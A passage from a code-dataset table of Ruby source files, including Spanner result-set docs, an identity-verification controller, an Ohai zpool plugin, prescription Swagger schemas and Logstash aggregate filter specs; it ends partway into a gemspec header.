hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
6a433e3ec6cdd8aa2cb02de83f33181a17c870dd | 8,614 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Spanner
module V1
# Results from {Google::Spanner::V1::Spanner::Read Read} or
# {Google::Spanner::V1::Spanner::ExecuteSql ExecuteSql}.
# @!attribute [rw] metadata
# @return [Google::Spanner::V1::ResultSetMetadata]
# Metadata about the result set, such as row type information.
# @!attribute [rw] rows
# @return [Array<Google::Protobuf::ListValue>]
# Each element in +rows+ is a row whose format is defined by
# {Google::Spanner::V1::ResultSetMetadata#row_type metadata::row_type}. The ith element
# in each row matches the ith field in
# {Google::Spanner::V1::ResultSetMetadata#row_type metadata::row_type}. Elements are
# encoded based on type as described
# {Google::Spanner::V1::TypeCode here}.
# @!attribute [rw] stats
# @return [Google::Spanner::V1::ResultSetStats]
# Query plan and execution statistics for the query that produced this
# result set. These can be requested by setting
# {Google::Spanner::V1::ExecuteSqlRequest#query_mode ExecuteSqlRequest#query_mode}.
# NOTE: the class body is intentionally empty — this appears to be a
# documentation-only stub; the actual fields are presumably supplied by the
# protobuf runtime (confirm against the generated _pb file).
class ResultSet; end
# Partial results from a streaming read or SQL query. Streaming reads and
# SQL queries better tolerate large result sets, large rows, and large
# values, but are a little trickier to consume.
# @!attribute [rw] metadata
# @return [Google::Spanner::V1::ResultSetMetadata]
# Metadata about the result set, such as row type information.
# Only present in the first response.
# @!attribute [rw] values
# @return [Array<Google::Protobuf::Value>]
# A streamed result set consists of a stream of values, which might
# be split into many +PartialResultSet+ messages to accommodate
# large rows and/or large values. Every N complete values defines a
# row, where N is equal to the number of entries in
# {Google::Spanner::V1::StructType#fields metadata::row_type::fields}.
#
# Most values are encoded based on type as described
# {Google::Spanner::V1::TypeCode here}.
#
# It is possible that the last value in values is "chunked",
# meaning that the rest of the value is sent in subsequent
# +PartialResultSet+(s). This is denoted by the {Google::Spanner::V1::PartialResultSet#chunked_value chunked_value}
# field. Two or more chunked values can be merged to form a
# complete value as follows:
#
# * +bool/number/null+: cannot be chunked
# * +string+: concatenate the strings
# * +list+: concatenate the lists. If the last element in a list is a
# +string+, +list+, or +object+, merge it with the first element in
# the next list by applying these rules recursively.
# * +object+: concatenate the (field name, field value) pairs. If a
# field name is duplicated, then apply these rules recursively
# to merge the field values.
#
# Some examples of merging:
#
# = Strings are concatenated.
# "foo", "bar" => "foobar"
#
# = Lists of non-strings are concatenated.
# [2, 3], [4] => [2, 3, 4]
#
# = Lists are concatenated, but the last and first elements are merged
# = because they are strings.
# ["a", "b"], ["c", "d"] => ["a", "bc", "d"]
#
# = Lists are concatenated, but the last and first elements are merged
# = because they are lists. Recursively, the last and first elements
# = of the inner lists are merged because they are strings.
# ["a", ["b", "c"]], [["d"], "e"] => ["a", ["b", "cd"], "e"]
#
# = Non-overlapping object fields are combined.
# {"a": "1"}, {"b": "2"} => {"a": "1", "b": "2"}
#
# = Overlapping object fields are merged.
# {"a": "1"}, {"a": "2"} => {"a": "12"}
#
# = Examples of merging objects containing lists of strings.
# {"a": ["1"]}, {"a": ["2"]} => {"a": ["12"]}
#
# For a more complete example, suppose a streaming SQL query is
# yielding a result set whose rows contain a single string
# field. The following +PartialResultSet+s might be yielded:
#
# {
# "metadata": { ... }
# "values": ["Hello", "W"]
# "chunked_value": true
# "resume_token": "Af65..."
# }
# {
# "values": ["orl"]
# "chunked_value": true
# "resume_token": "Bqp2..."
# }
# {
# "values": ["d"]
# "resume_token": "Zx1B..."
# }
#
# This sequence of +PartialResultSet+s encodes two rows, one
# containing the field value +"Hello"+, and a second containing the
# field value +"World" = "W" + "orl" + "d"+.
# @!attribute [rw] chunked_value
# @return [true, false]
# If true, then the final value in {Google::Spanner::V1::PartialResultSet#values values} is chunked, and must
# be combined with more values from subsequent +PartialResultSet+s
# to obtain a complete field value.
# @!attribute [rw] resume_token
# @return [String]
# Streaming calls might be interrupted for a variety of reasons, such
# as TCP connection loss. If this occurs, the stream of results can
# be resumed by re-sending the original request and including
# +resume_token+. Note that executing any other transaction in the
# same session invalidates the token.
# @!attribute [rw] stats
# @return [Google::Spanner::V1::ResultSetStats]
# Query plan and execution statistics for the query that produced this
# streaming result set. These can be requested by setting
# {Google::Spanner::V1::ExecuteSqlRequest#query_mode ExecuteSqlRequest#query_mode} and are sent
# only once with the last response in the stream.
# NOTE: the class body is intentionally empty — this appears to be a
# documentation-only stub; the actual fields are presumably supplied by the
# protobuf runtime (confirm against the generated _pb file).
class PartialResultSet; end
# Metadata about a {Google::Spanner::V1::ResultSet ResultSet} or {Google::Spanner::V1::PartialResultSet PartialResultSet}.
# @!attribute [rw] row_type
# @return [Google::Spanner::V1::StructType]
# Indicates the field names and types for the rows in the result
# set. For example, a SQL query like +"SELECT UserId, UserName FROM
# Users"+ could return a +row_type+ value like:
#
# "fields": [
# { "name": "UserId", "type": { "code": "INT64" } },
# { "name": "UserName", "type": { "code": "STRING" } },
# ]
# @!attribute [rw] transaction
# @return [Google::Spanner::V1::Transaction]
# If the read or SQL query began a transaction as a side-effect, the
# information about the new transaction is yielded here.
# NOTE: the class body is intentionally empty — this appears to be a
# documentation-only stub; the actual fields are presumably supplied by the
# protobuf runtime (confirm against the generated _pb file).
class ResultSetMetadata; end
# Additional statistics about a {Google::Spanner::V1::ResultSet ResultSet} or {Google::Spanner::V1::PartialResultSet PartialResultSet}.
# @!attribute [rw] query_plan
# @return [Google::Spanner::V1::QueryPlan]
# {Google::Spanner::V1::QueryPlan QueryPlan} for the query associated with this result.
# @!attribute [rw] query_stats
# @return [Google::Protobuf::Struct]
# Aggregated statistics from the execution of the query. Only present when
# the query is profiled. For example, a query could return the statistics as
# follows:
#
# {
# "rows_returned": "3",
# "elapsed_time": "1.22 secs",
# "cpu_time": "1.19 secs"
# }
# NOTE: the class body is intentionally empty — this appears to be a
# documentation-only stub; the actual fields are presumably supplied by the
# protobuf runtime (confirm against the generated _pb file).
class ResultSetStats; end
end
end
end | 49.222857 | 141 | 0.586951 |
e2614798c6794a2e502f70164bfe797f6e5e58f3 | 4,779 | module Insured
class InteractiveIdentityVerificationsController < ApplicationController
  before_action :set_current_person

  # GET — starts an interactive identity verification session for @person.
  # Routing outcomes:
  #   * service unreachable (blank response)   -> "service_unavailable"
  #   * session could not be started (failed)  -> "failed_validation" (step 'start')
  #   * otherwise                              -> render the question form
  def new
    service = ::IdentityVerification::InteractiveVerificationService.new
    service_response = service.initiate_session(render_session_start)
    respond_to do |format|
      format.html do
        # Flattened from nested if/else to if/elsif/else; behavior unchanged.
        if service_response.blank?
          redirect_to :action => "service_unavailable"
        elsif service_response.failed?
          @step = 'start'
          @verification_response = service_response
          redirect_to :action => "failed_validation", :step => @step, :verification_transaction_id => @verification_response.transaction_id
        else
          @interactive_verification = service_response.to_model
          render :new
        end
      end
    end
  end

  # Shown when the external verification service cannot be reached.
  # Also moves the consumer's identity documents to "outstanding".
  def service_unavailable
    set_consumer_bookmark_url
    @person.consumer_role.move_identity_documents_to_outstanding
    render "service_unavailable"
  end

  # Shown when the service answered but the identity check did not pass.
  # params[:step] records which stage failed ('start' or 'questions').
  def failed_validation
    set_consumer_bookmark_url
    @step = params[:step]
    @verification_transaction_id = params[:verification_transaction_id]
    @person.consumer_role.move_identity_documents_to_outstanding
    render "failed_validation"
  end

  # POST — submits the user's answers to the verification questions.
  def create
    # SECURITY NOTE(review): `permit!` whitelists every submitted attribute,
    # so the model's own validation is the only guard against mass
    # assignment here. Consider an explicit permit list.
    @interactive_verification = ::IdentityVerification::InteractiveVerification.new(params.require(:interactive_verification).permit!.to_h)
    respond_to do |format|
      format.html do
        if @interactive_verification.valid?
          service = ::IdentityVerification::InteractiveVerificationService.new
          service_response = service.respond_to_questions(render_question_responses(@interactive_verification))
          if service_response.blank?
            redirect_to :action => "service_unavailable"
          elsif service_response.successful?
            process_successful_interactive_verification(service_response)
          else
            @step = 'questions'
            @verification_response = service_response
            redirect_to :action => "failed_validation", :step => @step, :verification_transaction_id => @verification_response.transaction_id
          end
        else
          render "new"
        end
      end
    end
  end

  # PUT — asks the service whether a manual override exists for the given
  # verification transaction id.
  def update
    @transaction_id = params.require(:id)
    respond_to do |format|
      format.html do
        service = ::IdentityVerification::InteractiveVerificationService.new
        service_response = service.check_override(render_verification_override(@transaction_id))
        if service_response.blank?
          redirect_to :action => "service_unavailable"
        elsif service_response.successful?
          process_successful_interactive_verification(service_response)
        else
          @verification_response = service_response
          redirect_to :action => "failed_validation", :verification_transaction_id => @verification_response.transaction_id
        end
      end
    end
  end

  # Records a successful verification on the person's user account (when one
  # exists), marks the identity documents verified, and redirects to either
  # the admin bookmark URL or the family members page.
  def process_successful_interactive_verification(service_response)
    consumer_role = @person.consumer_role
    consumer_user = @person.user
    # TODO(TREY/KEVIN/JIM): there is no user when a CSR creates the
    # enrollment, hence the nil guard below.
    if consumer_user
      consumer_user.identity_final_decision_code = User::INTERACTIVE_IDENTITY_VERIFICATION_SUCCESS_CODE
      consumer_user.identity_response_code = User::INTERACTIVE_IDENTITY_VERIFICATION_SUCCESS_CODE
      consumer_user.identity_response_description_text = service_response.response_text
      consumer_user.identity_final_decision_transaction_id = service_response.transaction_id
      consumer_user.identity_verified_date = TimeKeeper.date_of_record
      consumer_user.save!
    end
    consumer_role.move_identity_documents_to_verified
    redirect_to consumer_role.admin_bookmark_url.present? ? consumer_role.admin_bookmark_url : insured_family_members_path(:consumer_role_id => consumer_role.id)
  end

  # Renders the XML payload that starts a verification session for @person.
  def render_session_start
    render_to_string "events/identity_verification/interactive_session_start", :formats => ["xml"], :locals => { :individual => @person }
  end

  # Renders the XML payload carrying the user's answers for +session+.
  def render_question_responses(session)
    render_to_string "events/identity_verification/interactive_questions_response", :formats => ["xml"], :locals => { :session => session }
  end

  # Renders the XML payload for an override check on +transaction_id+.
  def render_verification_override(transaction_id)
    render_to_string "events/identity_verification/interactive_verification_override", :formats => ["xml"], :locals => { :transaction_id => transaction_id }
  end
end
end
| 41.556522 | 163 | 0.69638 |
b9b07287501bd197f1a98eb2006c334852d72be2 | 2,318 | #
# Author:: Jason J. W. Williams ([email protected])
# Copyright:: Copyright (c) 2011 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
Ohai.plugin(:Zpools) do
  provides "zpools"

  collect_data(:solaris2) do
    pools = Mash.new

    # Grab ZFS zpools overall health and attributes; `zpool list -H` emits
    # one tab-separated line per pool.
    so = shell_out("zpool list -H -o name,size,alloc,free,cap,dedup,health,version")
    so.stdout.lines do |line|
      case line
      when /^([-_0-9A-Za-z]*)\s+([.0-9]+[MGTPE])\s+([.0-9]+[MGTPE])\s+([.0-9]+[MGTPE])\s+(\d+%)\s+([.0-9]+x)\s+([-_0-9A-Za-z]+)\s+(\d+|-)$/
        pools[$1] = Mash.new
        pools[$1][:pool_size] = $2
        pools[$1][:pool_allocated] = $3
        pools[$1][:pool_free] = $4
        pools[$1][:capacity_used] = $5
        pools[$1][:dedup_factor] = $6
        pools[$1][:health] = $7
        pools[$1][:zpool_version] = $8
      end
    end

    # Grab individual health for devices in the zpools.
    # `each_key` replaces the non-idiomatic `for pool in pools.keys` loop,
    # which also leaked its loop variable into the enclosing scope.
    pools.each_key do |pool|
      pools[pool][:devices] = Mash.new
      # Run "zpool status" as non-root user (adm) so that
      # the command won't try to open() each device which can
      # hang the command if any of the disks are bad.
      so = shell_out("su adm -c \"zpool status #{pool}\"")
      so.stdout.lines do |line|
        case line
        when /^\s+(c[-_a-zA-Z0-9]+)\s+([-_a-zA-Z0-9]+)\s+(\d+)\s+(\d+)\s+(\d+)$/
          pools[pool][:devices][$1] = Mash.new
          pools[pool][:devices][$1][:state] = $2
          pools[pool][:devices][$1][:errors] = Mash.new
          pools[pool][:devices][$1][:errors][:read] = $3
          pools[pool][:devices][$1][:errors][:write] = $4
          pools[pool][:devices][$1][:errors][:checksum] = $5
        end
      end
    end

    # Set the zpools attribute with the collected data.
    zpools pools
  end
end
| 35.661538 | 139 | 0.601381 |
6a903b1d62a228052963efff4d06a48d66903050 | 2,444 | # frozen_string_literal: true
module Swagger
module Schemas
module Health
# Swagger (OpenAPI) schema definitions for prescription responses, declared
# via the swagger-blocks DSL. Defines three schemas: the list envelope
# (:Prescriptions), the single-record envelope (:Prescription), and the
# shared record shape (:PrescriptionBase).
class Prescriptions
include Swagger::Blocks
# List response: a non-empty, unique array of PrescriptionBase records
# plus pagination/sort metadata and collection links.
swagger_schema :Prescriptions do
key :required, %i[data meta]
property :data, type: :array, minItems: 1, uniqueItems: true do
items do
key :'$ref', :PrescriptionBase
end
end
property :meta do
key :'$ref', :MetaFailedStationListSortPagination
end
property :links do
key :'$ref', :LinksAll
end
end
# Single-record response: one PrescriptionBase record plus metadata.
swagger_schema :Prescription do
key :required, %i[data meta]
property :data, type: :object do
key :'$ref', :PrescriptionBase
end
property :meta do
key :'$ref', :MetaFailedStationList
end
end
# Shared record shape: a JSON:API-style resource with id/type/attributes/links.
swagger_schema :PrescriptionBase do
key :required, %i[id type attributes links]
property :id, type: :string
property :type, type: :string, enum: [:prescriptions]
property :attributes, type: :object do
key :required, %i[
prescription_id prescription_number prescription_name refill_status refill_submit_date
refill_date refill_remaining facility_name ordered_date quantity expiration_date
dispensed_date station_number is_refillable is_trackable
]
property :prescription_id, type: :integer
property :prescription_number, type: :string
property :prescription_name, type: :string
property :refill_status, type: :string
# Nullable dates: refill_submit_date and dispensed_date may be null.
property :refill_submit_date, type: %i[string null], format: :date
property :refill_date, type: :string, format: :date
property :refill_remaining, type: :integer
property :facility_name, type: :string
property :ordered_date, type: :string, format: :date
property :quantity, type: :integer
property :expiration_date, type: :string, format: :date
property :dispensed_date, type: %i[string null], format: :date
property :station_number, type: :string
property :is_refillable, type: :boolean
property :is_trackable, type: :boolean
end
property :links do
key :'$ref', :LinksSelf
end
end
end
end
end
end
| 32.586667 | 100 | 0.589607 |
62c80d8d7e06da3861deee326b4cf78fdb2f74e5 | 19,040 | # encoding: utf-8
require "logstash/devutils/rspec/spec_helper"
require "logstash/filters/aggregate"
require_relative "aggregate_spec_helper"
describe LogStash::Filters::Aggregate do
# NOTE(review): helpers such as setup_filter, start_event, aggregate_maps and
# reset_pipeline_variables come from the required aggregate_spec_helper.
before(:each) do
reset_pipeline_variables()
@start_filter = setup_filter({ "map_action" => "create", "code" => "map['sql_duration'] = 0" })
@update_filter = setup_filter({ "map_action" => "update", "code" => "map['sql_duration'] += event.get('duration')" })
@end_filter = setup_filter({"timeout_task_id_field" => "my_id", "push_map_as_event_on_timeout" => true, "map_action" => "update", "code" => "event.set('sql_duration', map['sql_duration'])", "end_of_task" => true, "timeout" => 5, "inactivity_timeout" => 2, "timeout_code" => "event.set('test', 'testValue')", "timeout_tags" => ["tag1", "tag2"] })
end
context "Validation" do
describe "and register a filter with a task_id without dynamic expression" do
it "raises a LogStash::ConfigurationError" do
expect {
setup_filter({ "code" => "", "task_id" => "static_value" })
}.to raise_error(LogStash::ConfigurationError)
end
end
describe "and register a filter with inactivity_timeout longer than timeout" do
it "raises a LogStash::ConfigurationError" do
expect {
# use a different task_id pattern, otherwise the timeout settings cannot be updated
setup_filter({ "task_id" => "%{taskid2}", "code" => "", "timeout" => 2, "inactivity_timeout" => 3 })
}.to raise_error(LogStash::ConfigurationError)
end
end
end
context "Start event" do
describe "and receiving an event without task_id" do
it "does not record it" do
@start_filter.filter(event())
expect(aggregate_maps["%{taskid}"]).to be_empty
end
end
describe "and receiving an event with task_id" do
it "records it" do
event = start_event("taskid" => "id123")
@start_filter.filter(event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(aggregate_maps["%{taskid}"]["id123"]).not_to be_nil
expect(aggregate_maps["%{taskid}"]["id123"].creation_timestamp).to be >= event.timestamp.time
expect(aggregate_maps["%{taskid}"]["id123"].map["sql_duration"]).to eq(0)
end
end
describe "and receiving two 'start events' for the same task_id" do
it "keeps the first one and does nothing with the second one" do
first_start_event = start_event("taskid" => "id124")
@start_filter.filter(first_start_event)
first_update_event = update_event("taskid" => "id124", "duration" => 2)
@update_filter.filter(first_update_event)
sleep(1)
second_start_event = start_event("taskid" => "id124")
@start_filter.filter(second_start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(aggregate_maps["%{taskid}"]["id124"].creation_timestamp).to be < second_start_event.timestamp.time
expect(aggregate_maps["%{taskid}"]["id124"].map["sql_duration"]).to eq(first_update_event.get("duration"))
end
end
end
context "End event" do
describe "receiving an event without a previous 'start event'" do
describe "but without a previous 'start event'" do
it "does nothing with the event" do
end_event = end_event("taskid" => "id124")
@end_filter.filter(end_event)
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(end_event.get("sql_duration")).to be_nil
end
end
end
end
context "Start/end events interaction" do
describe "receiving a 'start event'" do
before(:each) do
@task_id_value = "id_123"
@start_event = start_event({"taskid" => @task_id_value})
@start_filter.filter(@start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
describe "and receiving an end event" do
describe "and without an id" do
it "does nothing" do
end_event = end_event()
@end_filter.filter(end_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(end_event.get("sql_duration")).to be_nil
end
end
describe "and an id different from the one of the 'start event'" do
it "does nothing" do
different_id_value = @task_id_value + "_different"
@end_filter.filter(end_event("taskid" => different_id_value))
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(aggregate_maps["%{taskid}"][@task_id_value]).not_to be_nil
end
end
describe "and the same id of the 'start event'" do
it "add 'sql_duration' field to the end event and deletes the aggregate map associated to taskid" do
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(aggregate_maps["%{taskid}"][@task_id_value].map["sql_duration"]).to eq(0)
@update_filter.filter(update_event("taskid" => @task_id_value, "duration" => 2))
expect(aggregate_maps["%{taskid}"][@task_id_value].map["sql_duration"]).to eq(2)
end_event = end_event("taskid" => @task_id_value)
@end_filter.filter(end_event)
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(end_event.get("sql_duration")).to eq(2)
end
end
end
end
end
context "Event with integer task id" do
it "works as well as with a string task id" do
start_event = start_event("taskid" => 124)
@start_filter.filter(start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
end
context "Event which causes an exception when code call" do
it "intercepts exception, logs the error and tags the event with '_aggregateexception'" do
@start_filter = setup_filter({ "code" => "fail 'Test'" })
start_event = start_event("taskid" => "id124")
@start_filter.filter(start_event)
expect(start_event.get("tags")).to eq(["_aggregateexception"])
end
end
context "flush call" do
before(:each) do
@end_filter.timeout = 1
expect(@end_filter.timeout).to eq(1)
@task_id_value = "id_123"
@start_event = start_event({"taskid" => @task_id_value})
@start_filter.filter(@start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
describe "no timeout defined in none filter" do
it "defines a default timeout on a default filter" do
reset_timeout_management()
@end_filter.timeout = nil
expect(taskid_eviction_instance).to be_nil
@end_filter.flush()
expect(taskid_eviction_instance).to eq(@end_filter)
expect(@end_filter.timeout).to eq(LogStash::Filters::Aggregate::DEFAULT_TIMEOUT)
end
end
describe "timeout is defined on another filter" do
it "taskid eviction_instance is not updated" do
expect(taskid_eviction_instance).not_to be_nil
@start_filter.flush()
expect(taskid_eviction_instance).not_to eq(@start_filter)
expect(taskid_eviction_instance).to eq(@end_filter)
end
end
describe "no timeout defined on the filter" do
it "event is not removed" do
sleep(2)
@start_filter.flush()
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
end
describe "timeout defined on the filter" do
it "event is not removed if not expired" do
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(entries).to be_empty
end
it "removes event if expired and creates a new timeout event" do
sleep(2)
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(entries.size).to eq(1)
expect(entries[0].get("my_id")).to eq("id_123") # task id
expect(entries[0].get("sql_duration")).to eq(0) # Aggregation map
expect(entries[0].get("test")).to eq("testValue") # Timeout code
expect(entries[0].get("tags")).to eq(["tag1", "tag2"]) # Timeout tags
end
end
describe "timeout defined on another filter with another task_id pattern" do
it "does not remove event" do
another_filter = setup_filter({ "task_id" => "%{another_taskid}", "code" => "", "timeout" => 1 })
sleep(2)
entries = another_filter.flush()
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(entries).to be_empty
end
end
context "inactivity_timeout" do
before(:each) do
@end_filter.timeout = 4
expect(@end_filter.timeout).to eq(4)
@end_filter.inactivity_timeout = 2
expect(@end_filter.inactivity_timeout).to eq(2)
@task_id_value = "id_123"
@start_event = start_event({"taskid" => @task_id_value})
@start_filter.filter(@start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
describe "event arrives before inactivity_timeout" do
it "does not remove event if another" do
expect(aggregate_maps["%{taskid}"].size).to eq(1)
sleep(1)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"].size).to eq(1)
expect(entries).to be_empty
end
end
describe "no event arrives after inactivity_timeout" do
it "removes event" do
expect(aggregate_maps["%{taskid}"].size).to eq(1)
sleep(3)
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(entries.size).to eq(1)
end
end
describe "timeout expires while events arrive within inactivity_timeout" do
it "removes event" do
expect(aggregate_maps["%{taskid}"].size).to eq(1)
sleep(1)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
sleep(1)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
sleep(1)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
sleep(2)
@start_filter.filter(start_event({"task_id" => @task_id_value}))
entries = @end_filter.flush()
expect(aggregate_maps["%{taskid}"]).to be_empty
expect(entries.size).to eq(1)
end
end
end
end
context "aggregate_maps_path option is defined, " do
describe "close event append then register event append, " do
it "stores aggregate maps to configured file and then loads aggregate maps from file" do
store_file = "aggregate_maps"
File.delete(store_file) if File.exist?(store_file)
expect(File.exist?(store_file)).to be false
one_filter = setup_filter({ "task_id" => "%{one_special_field}", "code" => ""})
store_filter = setup_filter({ "code" => "map['sql_duration'] = 0", "aggregate_maps_path" => store_file })
expect(aggregate_maps["%{one_special_field}"]).to be_empty
expect(aggregate_maps["%{taskid}"]).to be_empty
start_event = start_event("taskid" => 124)
filter = store_filter.filter(start_event)
expect(aggregate_maps["%{taskid}"].size).to eq(1)
@end_filter.close()
expect(aggregate_maps).not_to be_empty
store_filter.close()
expect(File.exist?(store_file)).to be true
expect(current_pipeline).to be_nil
one_filter = setup_filter({ "task_id" => "%{one_special_field}", "code" => ""})
store_filter = setup_filter({ "code" => "map['sql_duration'] = 0", "aggregate_maps_path" => store_file })
expect(File.exist?(store_file)).to be false
expect(aggregate_maps["%{one_special_field}"]).to be_empty
expect(aggregate_maps["%{taskid}"].size).to eq(1)
end
end
describe "when aggregate_maps_path option is defined in 2 instances, " do
it "raises Logstash::ConfigurationError" do
expect {
setup_filter({ "code" => "", "aggregate_maps_path" => "aggregate_maps1" })
setup_filter({ "code" => "", "aggregate_maps_path" => "aggregate_maps2" })
}.to raise_error(LogStash::ConfigurationError)
end
end
end
context "Logstash reload occurs, " do
describe "close method is called, " do
it "reinitializes pipelines" do
@end_filter.close()
expect(current_pipeline).to be_nil
@end_filter.register()
expect(current_pipeline).not_to be_nil
expect(aggregate_maps).not_to be_nil
expect(pipeline_close_instance).to be_nil
end
end
end
context "push_previous_map_as_event option is defined, " do
describe "when push_previous_map_as_event option is activated on another filter with same task_id pattern" do
it "should throw a LogStash::ConfigurationError" do
expect {
setup_filter({"code" => "map['taskid'] = event.get('taskid')", "push_previous_map_as_event" => true})
}.to raise_error(LogStash::ConfigurationError)
end
end
describe "when a new task id is detected, " do
it "should push previous map as new event" do
push_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['ppm_id'] = event.get('ppm_id')", "push_previous_map_as_event" => true, "timeout" => 5, "timeout_task_id_field" => "timeout_task_id_field" })
push_filter.filter(event({"ppm_id" => "1"})) { |yield_event| fail "task 1 shouldn't have yield event" }
push_filter.filter(event({"ppm_id" => "2"})) do |yield_event|
expect(yield_event.get("ppm_id")).to eq("1")
expect(yield_event.get("timeout_task_id_field")).to eq("1")
end
expect(aggregate_maps["%{ppm_id}"].size).to eq(1)
end
end
describe "when timeout happens, " do
it "flush method should return last map as new event" do
push_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['ppm_id'] = event.get('ppm_id')", "push_previous_map_as_event" => true, "timeout" => 1, "timeout_code" => "event.set('test', 'testValue')" })
push_filter.filter(event({"ppm_id" => "1"}))
sleep(2)
events_to_flush = push_filter.flush()
expect(events_to_flush).not_to be_nil
expect(events_to_flush.size).to eq(1)
expect(events_to_flush[0].get("ppm_id")).to eq("1")
expect(events_to_flush[0].get('test')).to eq("testValue")
expect(aggregate_maps["%{ppm_id}"].size).to eq(0)
end
end
describe "when Logstash shutdown happens, " do
it "flush method should return last map as new event even if timeout has not occured" do
push_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "", "push_previous_map_as_event" => true, "timeout" => 4 })
push_filter.filter(event({"ppm_id" => "1"}))
events_to_flush = push_filter.flush({:final=>false})
expect(events_to_flush).to be_empty
expect(aggregate_maps["%{ppm_id}"].size).to eq(1)
events_to_flush = push_filter.flush({:final=>true})
expect(events_to_flush).not_to be_nil
expect(events_to_flush.size).to eq(1)
expect(events_to_flush[0].get("tags")).to eq(["_aggregatefinalflush"])
expect(aggregate_maps["%{ppm_id}"].size).to eq(0)
end
end
end
context "timeout_timestamp_field option is defined, " do
describe "when 3 old events arrive, " do
it "should push a new aggregated event using timeout based on events timestamp" do
agg_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['sql_duration'] ||= 0; map['sql_duration'] += event.get('duration')", "timeout_timestamp_field" => "@timestamp", "push_map_as_event_on_timeout" => true, "timeout" => 120 })
agg_filter.filter(event({"ppm_id" => "1", "duration" => 2, "@timestamp" => timestamp("2018-01-31T00:00:00Z")})) { |yield_event| fail "it shouldn't have yield event" }
agg_filter.filter(event({"ppm_id" => "1", "duration" => 3, "@timestamp" => timestamp("2018-01-31T00:00:01Z")})) { |yield_event| fail "it shouldn't have yield event" }
events_to_flush = agg_filter.flush()
expect(events_to_flush).to be_empty
agg_filter.filter(event({"ppm_id" => "1", "duration" => 4, "@timestamp" => timestamp("2018-01-31T00:05:00Z")})) do |yield_event|
expect(yield_event).not_to be_nil
expect(yield_event.get("sql_duration")).to eq(5)
end
expect(aggregate_maps["%{ppm_id}"].size).to eq(1)
expect(aggregate_maps["%{ppm_id}"]["1"].map["sql_duration"]).to eq(4)
end
end
end
context "custom timeout on map_meta, " do
describe "when map_meta.timeout=0, " do
it "should push a new aggregated event immediately" do
agg_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['sql_duration'] = 2; map_meta.timeout = 0", "push_map_as_event_on_timeout" => true, "timeout" => 120 })
agg_filter.filter(event({"ppm_id" => "1"})) do |yield_event|
expect(yield_event).not_to be_nil
expect(yield_event.get("sql_duration")).to eq(2)
end
expect(aggregate_maps["%{ppm_id}"]).to be_empty
end
end
describe "when map_meta.timeout=0 and push_map_as_event_on_timeout=false, " do
it "should just remove expired map and not push an aggregated event" do
agg_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map_meta.timeout = 0", "push_map_as_event_on_timeout" => false, "timeout" => 120 })
agg_filter.filter(event({"ppm_id" => "1"})) { |yield_event| fail "it shouldn't have yield event" }
expect(aggregate_maps["%{ppm_id}"]).to be_empty
end
end
describe "when map_meta.inactivity_timeout=1, " do
it "should push a new aggregated event at next flush call" do
agg_filter = setup_filter({ "task_id" => "%{ppm_id}", "code" => "map['sql_duration'] = 2; map_meta.inactivity_timeout = 1", "push_map_as_event_on_timeout" => true, "timeout" => 120 })
agg_filter.filter(event({"ppm_id" => "1"})) { |yield_event| fail "it shouldn't have yield event" }
expect(aggregate_maps["%{ppm_id}"].size).to eq(1)
sleep(2)
events_to_flush = agg_filter.flush()
expect(events_to_flush.size).to eq(1)
expect(aggregate_maps["%{ppm_id}"]).to be_empty
end
end
end
context "Custom event generation code is used" do
describe "when a new event is manually generated" do
it "should push a new event immediately" do
agg_filter = setup_filter({ "task_id" => "%{task_id}", "code" => "map['sql_duration'] = 2; new_event_block.call(LogStash::Event.new({:my_sql_duration => map['sql_duration']}))", "timeout" => 120 })
agg_filter.filter(event({"task_id" => "1"})) do |yield_event|
expect(yield_event).not_to be_nil
expect(yield_event.get("my_sql_duration")).to eq(2)
end
end
end
end
end | 43.669725 | 349 | 0.636345 |
391ed898c8cca178fac5dab2c4e2bc2a168db4bc | 1,254 | # -*- encoding: utf-8 -*-
# stub: globalid 0.3.6 ruby lib
# Installed-gem specification for globalid 0.3.6. The `installed_by_version`
